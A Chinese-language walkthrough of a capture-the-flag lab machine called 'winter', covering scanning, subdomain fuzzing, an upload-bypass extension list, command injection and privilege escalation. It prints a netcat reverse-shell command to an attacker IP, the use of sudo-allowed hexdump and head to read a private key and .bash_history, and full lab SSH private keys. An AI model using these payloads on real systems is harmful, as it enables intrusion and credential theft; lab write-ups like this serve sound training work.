信息收集 NAMP 扫描 1 2 3 4 5 6 7 8 9 10 11 12 IP=192.168.0.178 nmap $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-05 18:04 HKT Nmap scan report for 192.168.0.178 Host is up (0.0099s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done : 1 IP address (1 host up) scanned in 6.73 seconds
开着 80,跑一波目录。
1 gobuster dir -u http://$IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,7z,zip,pdf
有一个 robots.txt
http://192.168.0.178/robots.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 id whoami ls pwd netstat -ano catchme winter cd cd ../ ftp ssh http smtp manager admin superadmin ceo cto https tftp nano vim parrot linux shell
有一个 apache 的手册。 http://192.168.0.178/manual/ 还有上传目录 http://192.168.0.178/upload/ 登录界面 http://192.168.0.178/login.php
登录里能去注册账号。 然后里面的 News 说:
1 2 3 4 5 6 7 8 9 10 1. winter_hacker found OS Command injection . 2. catchme found File Upload Vulnerability . 3. Technical Support found IDOR . Read More about OS Command Injection That's all for today's news
还贴心的送上了命令注入的文章: https://portswigger.net/web-security/os-command-injection
扫了一个 提示:http://192.168.0.178/fileinfo.txt
1 2 3 4 a small hint for you :) winter is my domain name!
有个域名?
加一下试试。
接下来访问 http://winter/
1 2 3 4 5 6 7 8 9 10 11 12 13 curl http://winter/ <html > <head > <meta charset ="UTF-8" /> <title > catchme</title > <link rel ="stylesheet" href ="glitch.css" /> </head > <body > <div class ="wrapper" > <h1 class ="glitch" > Winter</h1 > </div > </body > </html >
跑个目录呗:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 gobuster dir -u http://winter -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,7z,zip,pdf /contact.php (Status: 302) [Size: 1213] [--> login.php] /logout.php (Status: 302) [Size: 0] [--> login.php] /login.php (Status: 200) [Size: 900] /news.php (Status: 302) [Size: 855] [--> login.php] /upload (Status: 301) [Size: 301] [--> http://winter/upload/] /about.php (Status: 302) [Size: 1018] [--> login.php] /home.php (Status: 302) [Size: 904] [--> login.php] /javascript (Status: 301) [Size: 305] [--> http://winter/javascript/] /index.html (Status: 200) [Size: 201] /manual (Status: 301) [Size: 301] [--> http://winter/manual/] /signup.php (Status: 200) [Size: 856] /settings.php (Status: 302) [Size: 1259] [--> login.php] /robots.txt (Status: 200) [Size: 237] /server-status (Status: 403) [Size: 271] /.html (Status: 403) [Size: 271] /.php (Status: 403) [Size: 271] /fileinfo.txt (Status: 200) [Size: 52]
看起来和之前的一样。那就说明还有子域名。看着 robots.txt 里的提示,难道就是子域名了?先试试看:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 echo 'id whoami ls pwd netstat catchme winter cd ftp ssh http smtp manager admin superadmin ceo cto https tftp nano vim parrot linux shell ' > subdomain.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 wfuzz -w subdomain.txt -u http://winter/ -H "Host: FUZZ.winter" --hh 201 ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://winter/ Total requests: 24 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000012: 200 14 L 17 W 199 Ch "manager" Total time: 0.038893 Processed Requests: 24 Filtered Requests: 23 Requests/sec.: 617.0665
跑出来一个 manager 的子域名。 加上试试.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 gobuster dir -u http://manager.winter -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,7z,zip,pdf /contact.php (Status: 302) [Size: 1243] [--> login.php] /logout.php (Status: 302) [Size: 0] [--> login.php] /login.php (Status: 200) [Size: 1275] /news.php (Status: 302) [Size: 855] [--> login.php] /about.php (Status: 302) [Size: 1558] [--> login.php] /home.php (Status: 302) [Size: 907] [--> login.php] /javascript (Status: 301) [Size: 321] [--> http://manager.winter/javascript/] /index.html (Status: 200) [Size: 199] /manual (Status: 301) [Size: 317] [--> http://manager.winter/manual/] /server-status (Status: 403) [Size: 279] /.html (Status: 403) [Size: 279] /.php (Status: 403) [Size: 279] /index.html (Status: 200) [Size: 199] /.php (Status: 403) [Size: 279] /.html (Status: 403) [Size: 279] Progress: 393148 / 393155 (100.00%)
看起来似乎不太一样,又仿佛都一样。不过打开后发现确实不太一样了。登录页面长得不一样,而且账号密码也不一样。忘记密码功能是个摆设。都会跳转到 login.php 上。 仔细对比下, 会发现 manager.winter 其实是没有 upload 上传路径的。还有个 settings.php 也是没有的。 打开 settings.php 会发现是上传页面。而且Only .jpg images under 350Kb are accepted for upload
只能是 jpg 图片。 上传成功的 jpg 竟然 js 还是报错的。不过这个地方因为在 js 中输出了文件名,那么肯定是有 XSS 的。不过在这个地方似乎没啥用。 手动试了挺多 payload 都没啥用,虽然 jpg 图片马可以传,但是扩展名是 jpg ,又也没地方控制解析。 试着弄一个上传的字典:
1 2 3 git clone https://github.com/c0ny1/upload-fuzz-dic-builder.git python upload-fuzz-dic-builder.py -n 1 -a jpg -l php -m apache --os linux -o upload_file.txt
然后尝试用 Burp 的 Intruder 来 fuzz 上传。payload 用刚刚生成的 upload_file.txt,注意 注意这个地方,不要勾选,否则编码了之后,毛都传不上。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 1.phtml.xxx 1.php2.jpg 1.pHp3 1.pHp5.xxx 1.html%00.jpg 1.pHp4.xxx 1.pht%00.jpg 1.php2.xxx 1.pHp5%00.jpg 1.Html 1.pht.jpg 1.php4 1.pHp3 1.php2 1.php4 1.pHp3%00.jpg 1.pHtml.xxx 1.pHp5 1.phtml.jpg 1.htm%00.jpg 1.pHp5.jpg 1.pHp.xxx 1.Htm 1.php3.jpg 1.htm.xxx 1.pHp 1.html 1.Htm%00.jpg 1.pHp.jpg 1.pHp2.xxx 1.pHp4 1.pHtml 1.pHp2 1.Html%00.jpg 1.pHp3.jpg 1.php3.xxx 1.pHtml.jpg 1.Html.jpg 1.pHp 1.php%00.jpg 1.html.xxx 1.php2 1.php3 1.php3%00.jpg 1.Htm.xxx 1.php4.jpg 1.php.jpg 1.pHp3.xxx 1.php 1.php4.xxx 1.phtml 1.pHp2%00.jpg 1.pHtml 1.php.xxx 1.php5%00.jpg 1.htm.jpg 1.html.jpg 1.pHp5 1.phtml%00.jpg 1.pHp%00.jpg 1.Htm 1.php5.xxx 1.pht 1.html 1.pht.xxx 1.pHp4.jpg 1.htm 1.php4%00.jpg 1.Html.xxx 1.pHp2.jpg 1.php5.jpg 1.pHp2 1.Htm.jpg 1.phtml 1.php3 1.htm 1.pht 1.php5 1.Html 1.pHtml%00.jpg 1.pHp4%00.jpg 1.php5 1.php2%00.jpg 1.php 1.pHp4 .htaccess
上传结果大概看了下,能上传的,基本都是 .jpg 的结尾,中间可能有.php 或者.php3 之类的,但是 apache 也没有配置问题,所以不会用 php 解析这些文件。 暂时没有办法利用。换个思路吧。
尝试了 登录页面,看看是否有注入。简单用了 ‘ “ ` 等符号,看起来并没有什么效果。
一时间陷入僵局。
正当我打算爆破跑下这个 manager 的后台的时候,ll104567 提示了一下,说这个地方可以直接用 burp 拦一下请求,不用 301 跳转的情况下,其实能看见每个页面。这个时候才发现 gobuster 里面的 301 跳转,里面的页面大小是不一样的,说明页面渲染了。 不过同时也告诉我,其实也没用。 因为真的突破点在另一个大字典的子域名上。
再跑一个打字典看看子域名:
1 2 3 4 5 6 7 8 9 10 11 wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://winter/ -H "Host: FUZZ.winter" --hh 201 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000491: 200 14 L 17 W 199 Ch "manager" 000008160: 200 14 L 17 W 198 Ch "cmd"
跑了一个 cmd 的子域名。再跑一下路径看看。
1 gobuster dir -u http://cmd.winter -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,7z,zip,pdf
没啥东西。不过如果子域名是 cmd,再加上之前的 robots.txt 里的提示,是不是有一个命令注入?
1 wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -u http://cmd.winter/?FUZZ=id --hh 198
一顿扫描啥都没有。又卡了一会,实在受不了了去看了 ll104567 的 WP ,卧槽,原来还是我用的字典不行。我真服了。。
换个字典:
1 2 3 gobuster dir -u http://cmd.winter -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html,7z,zip,pdf /shellcity.php (Status: 200) [Size: 1040]
果然多了一条。不过我的思路是对的:
1 2 3 wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -u http://cmd.winter/shellcity.php?FUZZ=id --hh 198 000003009: 200 57 L 106 W 1147 Ch "run"
跑出来了一个 run 的参数。可以执行命令。http://cmd.winter/shellcity.php?run=nc%20-e%20/bin/bash%20192.168.0.30%201234
成功拿到 webshell。
提权 1 2 3 4 5 6 7 8 9 10 11 12 13 14 (remote) www-data@winter:/var/www/cmd$ sudo -l Matching Defaults entries for www-data on winter: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on winter: (catchme) NOPASSWD: /usr/bin/hexdump (remote) www-data@winter:/var/www/cmd$ sudo -u catchme /usr/bin/hexdump -h /usr/bin/hexdump: invalid option -- 'h' usage: hexdump [-bcCdovx] [-e fmt ] [-f fmt_file] [-n length] [-s skip] [file ...] hd [-bcdovx] [-e fmt ] [-f fmt_file] [-n length] [-s skip] [file ...]
这玩意看起来可以 16 进制看文件。那读下 flag?
1 2 3 sudo -u catchme /usr/bin/hexdump -C /home/catchme/user.txt 00000000 48 4d 56 6c 6f 63 61 6c 68 6f 73 74 0a 0000000d
还真可以。
读私钥呗:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 (remote) www-data@winter:/var/www/cmd$ sudo -u catchme /usr/bin/hexdump -C /home/catchme/.ssh/id_rsa 00000000 2d 2d 2d 2d 2d 42 45 47 49 4e 20 4f 50 45 4e 53 |-----BEGIN OPENS| 00000010 53 48 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d |SH PRIVATE KEY--| 00000020 2d 2d 2d 0a 62 33 42 6c 62 6e 4e 7a 61 43 31 72 |---.b3BlbnNzaC1r| 00000030 5a 58 6b 74 64 6a 45 41 41 41 41 41 42 47 35 76 |ZXktdjEAAAAABG5v| 00000040 62 6d 55 41 41 41 41 45 62 6d 39 75 5a 51 41 41 |bmUAAAAEbm9uZQAA| 00000050 41 41 41 41 41 41 41 42 41 41 41 42 46 77 41 41 |AAAAAAABAAABFwAA| 00000060 41 41 64 7a 63 32 67 74 63 6e 0a 4e 68 41 41 41 |AAdzc2gtcn.NhAAA| 00000070 41 41 77 45 41 41 51 41 41 41 51 45 41 74 53 53 |AAwEAAQAAAQEAtSS| 00000080 4e 55 6d 4f 32 30 46 4a 6e 49 47 47 74 6d 35 67 |NUmO20FJnIGGtm5g| 00000090 57 44 33 78 41 31 5a 47 66 67 34 78 6d 56 74 57 |WD3xA1ZGfg4xmVtW| 000000a0 46 6f 35 75 56 4c 47 38 57 42 74 4b 77 54 4d 62 |Fo5uVLG8WBtKwTMb| 000000b0 50 0a 65 54 30 52 78 70 32 32 39 61 51 34 62 6b |P.eT0Rxp229aQ4bk| 000000c0 70 67 62 32 45 56 4b 51 6a 65 45 6c 58 52 47 39 |pgb2EVKQjeElXRG9| 000000d0 44 6a 68 52 41 52 6b 43 6d 2f 49 61 46 77 54 38 |DjhRARkCm/IaFwT8| 000000e0 54 64 53 33 52 50 68 72 48 35 44 45 33 47 4d 64 |TdS3RPhrH5DE3GMd| 000000f0 77 44 5a 46 61 4b 61 49 0a 4a 37 51 63 5a 6f 73 |wDZFaKaI.J7QcZos| 00000100 4d 4c 54 2b 6f 35 65 45 37 31 6b 69 32 5a 42 4a |MLT+o5eE71ki2ZBJ| 00000110 48 67 69 43 71 65 69 4a 47 31 64 4d 2b 56 32 57 |HgiCqeiJG1dM+V2W| 00000120 37 67 58 72 71 36 76 43 41 56 57 67 4a 36 39 4b |7gXrq6vCAVWgJ69K| 00000130 51 56 61 78 56 31 71 6d 4e 45 37 31 4b 6b 6a 0a |QVaxV1qmNE71Kkj.| 00000140 31 43 6e 6b 42 46 6f 6e 73 66 39 74 51 74 31 32 |1CnkBFonsf9tQt12| 00000150 47 4a 6d 2f 75 38 62 76 57 48 41 49 34 5a 4f 75 |GJm/u8bvWHAI4ZOu| 00000160 6e 63 36 6f 53 56 45 4f 51 57 55 30 64 77 32 6f |nc6oSVEOQWU0dw2o| 00000170 50 43 2b 51 44 79 72 30 30 37 54 2f 62 6d 6c 58 |PC+QDyr007T/bmlX| 00000180 6d 4e 7a 50 6d 4f 0a 6a 66 44 76 46 78 65 37 39 |mNzPmO.jfDvFxe79| 00000190 58 73 42 6b 4d 78 67 76 77 6e 51 4a 55 36 71 48 |XsBkMxgvwnQJU6qH| 000001a0 30 38 66 4c 38 2b 32 46 46 7a 79 49 68 66 71 2f |08fL8+2FFzyIhfq/| 000001b0 44 66 66 47 5a 58 74 64 33 47 43 39 6f 6a 73 55 |DffGZXtd3GC9ojsU| 000001c0 50 70 2b 6c 59 65 4e 44 70 48 48 35 6e 0a 64 69 |Pp+lYeNDpHH5n.di| 000001d0 39 6d 53 44 69 7a 2b 51 41 41 41 38 6a 4d 41 35 |9mSDiz+QAAA8jMA5| 000001e0 36 36 7a 41 4f 65 75 67 41 41 41 41 64 7a 63 32 |66zAOeugAAAAdzc2| 000001f0 67 74 63 6e 4e 68 41 41 41 42 41 51 43 31 4a 49 |gtcnNhAAABAQC1JI| 00000200 31 53 59 37 62 51 55 6d 63 67 59 61 32 62 6d 42 |1SY7bQUmcgYa2bmB| 00000210 59 50 66 45 0a 44 56 6b 5a 2b 44 6a 47 5a 57 31 |YPfE.DVkZ+DjGZW1| 00000220 59 57 6a 6d 35 55 73 62 78 59 47 30 72 42 4d 78 |YWjm5UsbxYG0rBMx| 00000230 73 39 35 50 52 48 47 6e 62 62 31 70 44 68 75 53 |s95PRHGnbb1pDhuS| 00000240 6d 42 76 59 52 55 70 43 4e 34 53 56 64 45 62 30 |mBvYRUpCN4SVdEb0| 00000250 4f 4f 46 45 42 47 51 4b 62 38 68 0a 6f 58 42 50 |OOFEBGQKb8h.oXBP| 00000260 78 4e 31 4c 64 45 2b 47 73 66 6b 4d 54 63 59 78 |xN1LdE+GsfkMTcYx| 00000270 33 41 4e 6b 56 6f 70 6f 67 6e 74 42 78 6d 69 77 |3ANkVopogntBxmiw| 00000280 77 74 50 36 6a 6c 34 54 76 57 53 4c 5a 6b 45 6b |wtP6jl4TvWSLZkEk| 00000290 65 43 49 4b 70 36 49 6b 62 56 30 7a 35 58 5a 62 |eCIKp6IkbV0z5XZb| 000002a0 75 42 0a 65 75 72 71 38 49 42 56 61 41 6e 72 30 |uB.eurq8IBVaAnr0| 000002b0 70 42 56 72 46 58 57 71 59 30 54 76 55 71 53 50 |pBVrFXWqY0TvUqSP| 000002c0 55 4b 65 51 45 57 69 65 78 2f 32 31 43 33 58 59 |UKeQEWiex/21C3XY| 000002d0 59 6d 62 2b 37 78 75 39 59 63 41 6a 68 6b 36 36 |Ymb+7xu9YcAjhk66| 000002e0 64 7a 71 68 4a 55 51 35 42 0a 5a 54 52 33 44 61 |dzqhJUQ5B.ZTR3Da| 000002f0 67 38 4c 35 41 50 4b 76 54 54 74 50 39 75 61 56 |g8L5APKvTTtP9uaV| 00000300 65 59 33 4d 2b 59 36 4e 38 4f 38 58 46 37 76 31 |eY3M+Y6N8O8XF7v1| 00000310 65 77 47 51 7a 47 43 2f 43 64 41 6c 54 71 6f 66 |ewGQzGC/CdAlTqof| 00000320 54 78 38 76 7a 37 59 55 58 50 49 69 46 2b 72 38 |Tx8vz7YUXPIiF+r8| 00000330 0a 4e 39 38 5a 6c 65 31 33 63 59 4c 32 69 4f 78 |.N98Zle13cYL2iOx| 00000340 51 2b 6e 36 56 68 34 30 4f 6b 63 66 6d 64 32 4c |Q+n6Vh40Okcfmd2L| 00000350 32 5a 49 4f 4c 50 35 41 41 41 41 41 77 45 41 41 |2ZIOLP5AAAAAwEAA| 00000360 51 41 41 41 51 41 57 41 6e 48 31 62 38 34 33 73 |QAAAQAWAnH1b843s| 00000370 37 74 36 45 4d 52 43 0a 59 70 46 54 6f 6c 70 53 |7t6EMRC.YpFTolpS| 00000380 57 4e 5a 54 36 6f 78 49 77 72 72 78 4c 53 64 4c |WNZT6oxIwrrxLSdL| 00000390 39 64 64 73 54 73 39 44 46 4f 6b 43 70 79 76 77 |9ddsTs9DFOkCpyvw| 000003a0 77 52 73 49 37 38 49 33 6a 47 76 35 50 49 65 51 |wRsI78I3jGv5PIeQ| 000003b0 71 39 59 6e 7a 69 75 52 51 4b 6c 55 63 71 0a 5a |q9YnziuRQKlUcq.Z| 000003c0 66 71 4f 4c 6a 57 44 56 49 53 2f 68 44 67 63 64 |fqOLjWDVIS/hDgcd| 000003d0 6a 36 31 34 43 59 37 54 51 50 42 5a 68 61 36 35 |j614CY7TQPBZha65| 000003e0 33 6b 6c 73 64 6d 39 6a 2b 6d 54 32 65 64 51 76 |3klsdm9j+mT2edQv| 000003f0 7a 52 42 44 69 61 7a 4e 42 46 69 4f 30 76 62 65 |zRBDiazNBFiO0vbe| 00000400 53 79 34 4d 47 0a 6d 6a 76 75 57 77 6a 74 6e 61 |Sy4MG.mjvuWwjtna| 00000410 59 41 79 45 6a 65 4f 38 7a 68 39 4e 51 58 41 47 |YAyEjeO8zh9NQXAG| 00000420 72 4c 69 59 78 73 79 42 68 45 44 63 74 56 39 51 |rLiYxsyBhEDctV9Q| 00000430 4e 33 45 2f 32 78 67 6e 30 47 37 32 31 72 62 62 |N3E/2xgn0G721rbb| 00000440 73 58 36 71 6d 7a 2b 52 6c 74 57 33 0a 44 46 4c |sX6qmz+RltW3.DFL| 00000450 43 46 54 6a 51 69 4c 4a 65 2b 62 34 79 6d 48 70 |CFTjQiLJe+b4ymHp| 00000460 35 4c 74 6f 43 38 72 6e 62 70 4a 41 71 69 75 41 |5LtoC8rnbpJAqiuA| 00000470 4f 6e 4a 77 77 72 6f 38 38 4c 53 75 71 47 2b 6f |OnJwwro88LSuqG+o| 00000480 2b 78 79 47 76 4d 6f 45 4b 6a 4d 35 70 65 51 73 |+xyGvMoEKjM5peQs| 00000490 2f 67 35 0a 36 38 55 6a 65 77 58 48 35 36 68 39 |/g5.68UjewXH56h9| 000004a0 44 47 76 54 69 2b 7a 55 6d 50 30 66 51 68 36 52 |DGvTi+zUmP0fQh6R| 000004b0 32 4c 53 33 73 6c 6e 64 79 68 59 33 33 5a 65 39 |2LS3slndyhY33Ze9| 000004c0 41 41 41 41 67 51 44 67 78 6b 4c 57 61 56 36 56 |AAAAgQDgxkLWaV6V| 000004d0 61 52 31 39 76 4a 53 4b 75 45 0a 62 7a 4f 61 66 |aR19vJSKuE.bzOaf| 000004e0 7a 31 56 58 49 41 65 62 65 59 30 72 7a 46 36 35 |z1VXIAebeY0rzF65| 000004f0 49 56 75 5a 50 65 75 38 69 34 65 72 35 45 2b 44 |IVuZPeu8i4er5E+D| 00000500 46 32 43 43 6f 46 48 46 61 30 39 67 6c 57 6a 36 |F2CCoFHFa09glWj6| 00000510 53 2f 30 71 70 68 48 69 71 46 30 51 68 6b 54 4f |S/0qphHiqF0QhkTO| 00000520 56 0a 33 62 6d 7a 6d 48 4d 50 62 37 61 7a 2f 30 |V.3bmzmHMPb7az/0| 00000530 2b 6c 6c 2f 39 35 71 70 78 52 5a 79 33 68 33 58 |+ll/95qpxRZy3h3X| 00000540 52 61 43 38 50 77 4d 50 63 79 6e 44 46 4d 49 67 |RaC8PwMPcynDFMIg| 00000550 63 70 2f 55 4f 66 70 74 2f 42 41 30 53 35 2b 6d |cp /UOfpt/BA0S5+m| 00000560 34 73 75 55 37 37 65 77 0a 4d 57 42 4d 46 6e 31 |4suU77ew.MWBMFn1| 00000570 50 63 78 6e 77 41 41 41 49 45 41 34 5a 6a 68 45 |PcxnwAAAIEA4ZjhE| 00000580 4e 39 72 51 32 46 57 6f 44 51 49 58 75 6c 32 34 |N9rQ2FWoDQIXul24| 00000590 45 61 64 5a 30 4c 42 44 50 72 6b 41 36 6c 43 2f |EadZ0LBDPrkA6lC/| 000005a0 36 6c 76 79 46 42 33 48 73 49 52 64 66 48 6f 0a |6lvyFB3HsIRdfHo.| 000005b0 62 5a 71 71 6d 78 2b 70 31 53 63 71 4d 4f 43 37 |bZqqmx+p1ScqMOC7| 000005c0 36 69 70 41 74 50 6d 6d 35 2f 50 6b 73 43 58 31 |6ipAtPmm5/PksCX1| 000005d0 43 71 42 31 37 37 55 35 54 32 44 42 67 63 35 59 |CqB177U5T2DBgc5Y| 000005e0 51 48 37 6e 4b 57 69 6d 64 6b 52 61 34 2b 46 39 |QH7nKWimdkRa4+F9| 000005f0 6d 37 75 6d 39 78 0a 58 33 77 47 36 6d 6c 50 69 |m7um9x.X3wG6mlPi| 00000600 6f 35 35 47 4e 54 4c 45 68 37 47 75 39 50 42 4c |o55GNTLEh7Gu9PBL| 00000610 38 4a 35 59 5a 45 74 57 70 71 35 78 54 54 39 65 |8J5YZEtWpq5xTT9e| 00000620 79 56 70 44 38 46 6d 63 41 41 41 43 42 41 4d 32 |yVpD8FmcAAACBAM2| 00000630 4e 2f 68 41 6d 4c 76 41 30 2b 67 69 37 0a 51 4f |N/hAmLvA0+gi7.QO| 00000640 68 4a 36 2f 77 2b 43 77 74 50 76 35 4b 67 66 65 |hJ6/w+CwtPv5Kgfe| 00000650 78 6c 6e 50 50 32 45 38 33 37 38 61 4a 75 35 67 |xlnPP2E8378aJu5g| 00000660 2b 4f 5a 4c 54 31 4f 59 58 4d 43 68 69 73 75 48 |+OZLT1OYXMChisuH| 00000670 53 46 43 6b 42 6f 45 52 53 72 45 58 51 68 49 74 |SFCkBoERSrEXQhIt| 00000680 2f 45 41 55 0a 61 64 41 55 4d 31 49 61 6e 6b 58 |/EAU.adAUM1IankX| 00000690 50 79 79 6e 78 47 56 49 57 6d 73 58 54 36 39 34 |PyynxGVIWmsXT694| 000006a0 4b 68 6c 4d 49 6d 44 65 53 31 4e 43 74 68 72 6f |KhlMImDeS1NCthro| 000006b0 32 6c 51 43 30 46 4b 59 57 53 38 4e 67 74 45 39 |2lQC0FKYWS8NgtE9| 000006c0 36 53 62 4f 32 57 69 61 52 7a 48 0a 42 62 6b 68 |6SbO2WiaRzH.Bbkh| 000006d0 72 6c 36 52 46 59 4b 64 34 4b 61 66 41 41 41 41 |rl6RFYKd4KafAAAA| 000006e0 44 6d 4e 68 64 47 4e 6f 62 57 56 41 64 32 6c 75 |DmNhdGNobWVAd2lu| 000006f0 64 47 56 79 41 51 49 44 42 41 3d 3d 0a 2d 2d 2d |dGVyAQIDBA==.---| 00000700 2d 2d 45 4e 44 20 4f 50 45 4e 53 53 48 20 50 52 |--END OPENSSH PR| 00000710 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a |IVATE KEY-----.| 0000071f
有密码。来破解一波:
1 2 ssh2john.py id > id.hash id has no password!
这给我整蒙了。。 只能又去看 ll104567 的 WP 了。原来是靶机的.ssh 目录权限设置有问题。 哎白瞎。实在没有思路,继续看下去。是要读 .bash_history 里面的内容。
1 2 3 4 sudo -u catchme /usr/bin/hexdump -C /home/catchme/.bash_history00000000 4d 79 20 50 61 73 73 77 6f 72 64 20 69 73 20 3a |My Password is :| 00000010 20 77 69 6e 74 65 72 75 73 65 72 63 61 74 63 68 | winterusercatch| 00000020 0a 65 78 69 74 0a |.exit .|
你说离谱不?
1 2 3 ssh catchme@$IP catchme@winter:~$ id uid=1000(catchme) gid=1000(catchme) groups =1000(catchme),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
Root 提权 1 2 3 4 5 6 7 catchme@winter:~$ sudo -l Matching Defaults entries for catchme on winter: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User catchme may run the following commands on winter: (root) NOPASSWD: /usr/bin/head
这。。 又是读取?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 catchme@winter:~$ sudo /usr/bin/head -n 1 /root/root.txt sudo /usr/bin/head -n 1000 /root/.ssh/id_rsa-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEA4F18HTzuOk3Paoz2Lw+zBanzInzlLNmaX0WWE+qvRmIKtxsPqacg OVA/sHTHAm/Ey/CpmdIvRUbPhmfeaDapO2qkgrmHYL+PyQ2I4UmkYxVFlogWaKIFqAi93X FZKDxTh5Vi2zieUmgMBRlYOaXcltJrYfF+CkBrwRFDEDRZ/csG9/mFBEyeZTTpNAe5VuPm RUoE0ynRvrf4UskGwJy2PvzHzqylwMR7ZWRwOeh8DsVHMiAmMhhX8eeJNKi2COtgcKvSiO Fr1AmLYA8O1i+KvXSuBf2LqXZvfeI3OywLbmwhmaPYJEqiinmmv6kyfOeyupknnrxYqCob 5KIkOQ6JjwAAA8ARV3ofEVd6HwAAAAdzc2gtcnNhAAABAQDgXXwdPO46Tc9qjPYvD7MFqf MifOUs2ZpfRZYT6q9GYgq3Gw+ppyA5UD+wdMcCb8TL8KmZ0i9FRs+GZ95oNqk7aqSCuYdg v4/JDYjhSaRjFUWWiBZoogWoCL3dcVkoPFOHlWLbOJ5SaAwFGVg5pdyW0mth8X4KQGvBEU MQNFn9ywb3+YUETJ5lNOk0B7lW4+ZFSgTTKdG+t/hSyQbAnLY+/MfOrKXAxHtlZHA56HwO xUcyICYyGFfx54k0qLYI62Bwq9KI4WvUCYtgDw7WL4q9dK4F/Yupdm994jc7LAtubCGZo9 gkSqKKeaa/qTJ857K6mSeevFioKhvkoiQ5DomPAAAAAwEAAQAAAQBP+eLhBTQiAlR6Na8X jXASB8eMNpr2hsaZSVO628AIxa/uHy5RGirJY0qgmq/JtY+f5rR+CUciWaBl16aW3U0ryd LEal/QY9hcIX/2VmrLiuyYQQBD4eVERYFwaxQN3JslzGFFpYQB+ea29pbVTcM42969Nfjo rJf8ZSvTneWqKkbrd4wC7rdwyT4MkvLMXcddDUq96lpZtTTrHK7UrnEEUyxvLGdicDEsHY OIN0R+Jy6PWYcqbqdG77Tz/COdqJK6F1AmZj2T2vSNgVqpJjRZSfJN3U5/1OZnEu00Cyjb +3XhhNNKRlW/iM9LOzq1D8L3Lm/mKgkK/AtHO3X8VScBAAAAgAEbod+nBWtuRkezkQY3Yh t1+7eXXIPjF2JTs1XonZ47/BbSO8ndQhYv/5j1RjubfENuQCqJzldFSv4INS3aaXfBzzmV +7+rA5ce4N53vLKdmZWrbx33aCl/mwM7VsZ1HhqDighl+EB4F0pE4KdMdscLcOyv1pc+w4 jFQd195s7NAAAAgQD3OlnliepszrdY/vlKdSpbUTU5Cx77t6d9bod1Fs37a/a0SRfswFw/ 7MS2ex56bU7wo7PE2qXJGEySEg3dFJhVNsRfAiR0j95MfTITXOmQ2vyrxdqppSguTnh+Xi uismWUWljX+6ylmq69aYtpKu1t1eF3zuL1kcViG4lPtd/SDwAAAIEA6FN2zCwZeC00j12P DFcM6BSAA/70OdNNNG+04p7HxkR5bWj4Yi386N/Epf18B4LCokX3GPCMvatAVx+cucpzPE pwoFaowj+STiVvzTZwd6vODETD1h1MKLRQMmdTcTb5yWMpxAoih7GeiusGWNQl0VDAmFfj TVtPYwN8hEFPUIEAAAALcm9vdEB3aW50ZXI= -----END OPENSSH PRIVATE KEY----- ssh root@$IP -i idroot [email protected] 's password:
这没完没了了是吗。 我以为还是读其他呢,又看了下 ll104567 的 WP, 确实没拿到 root,那我就放心了,完结撒花 🎉
总结 这个靶场最大的感想就是,坑比较多,能试的地方太多了,信息多了一开始很开心,实际上很折磨。 还有一个很重要的收获,没事多换换字典。